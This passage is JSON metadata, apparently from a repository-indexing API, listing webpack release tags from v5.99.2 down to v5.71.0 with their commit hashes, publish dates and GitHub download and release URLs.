g/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/we